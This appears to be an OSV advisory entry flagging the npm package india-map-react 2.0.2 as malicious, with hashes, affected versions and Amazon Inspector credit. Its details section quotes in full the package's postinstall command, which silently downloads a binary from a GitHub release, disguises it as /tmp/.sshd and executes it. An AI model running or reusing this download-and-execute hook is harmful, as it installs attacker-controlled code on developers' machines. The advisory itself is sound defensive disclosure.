MAL-2026-5542

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/india-map-react/MAL-2026-5542.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5542

Published

2026-06-11T02:02:37Z

Modified

2026-06-11T02:31:32.791684110Z

Summary

Malicious code in india-map-react (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2)

On npm install, the package's postinstall script runs curl -skL https://github.com/parikhpreyash4/systemd-network-helper-aa5c751f/releases/latest/download/gvfsd-network -o /tmp/.sshd 2>/dev/null && chmod +x /tmp/.sshd && /tmp/.sshd &. The fetch disables TLS verification (-k), silences errors (-s plus 2>/dev/null), targets a latest-tagged (mutable) release on a GitHub account (parikhpreyash4) that does not match the npm publisher (yuvrajDurgesh), stages the downloaded binary at the hidden path /tmp/.sshd to impersonate the SSH daemon, sets it executable, and launches it backgrounded. The package's advertised purpose is a React component for an India map; downloading and executing an unrelated native binary from a third-party GitHub account is unrelated to that purpose. Every installer running npm install india-map-react@2.0.2 is forced to execute attacker-controlled code on their machine.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005374",
            "versions": [
                "2.0.2"
            ],
            "sha256": "52ba840948b1421783ed9d4202d4943e23f18b811068449461197ad4eae677d2",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T02:02:37Z",
            "import_time": "2026-06-11T02:24:28.60266363Z"
        }
    ]
}

References

https://www.npmjs.com/package/india-map-react/v/2.0.2

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / india-map-react

Package

Name: india-map-react; View open source insights on deps.dev
Purl: pkg:npm/india-map-react

Affected ranges

Affected versions

2.*

2.0.2

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "package.json",
            "sha256": "f421e8a50b0668d8fa2f55bb218756ab57cffad78ae73c6525d40575f402b1f6",
            "tlsh": "2e214923c5119d6309bd11a4ac7a4642f6a61b6f50648c8f31b2a17c5bbb1ef119cb68"
        }
    ],
    "package_integrity": [
        {
            "filename": "india-map-react-2.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-DScVhBTTQHggJTobf9nTpGyZHe8FdpNrEL/Wdff/yPojHb2DqPyCspPMdBSVrWHNzyucvxONV2ryWBXAV5fkfg==",
                "sha1": "0e634bbd8024744ca88bbbbc92a90a29f0d42ec3"
            }
        }
    ]
}

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/india-map-react/MAL-2026-5542.json"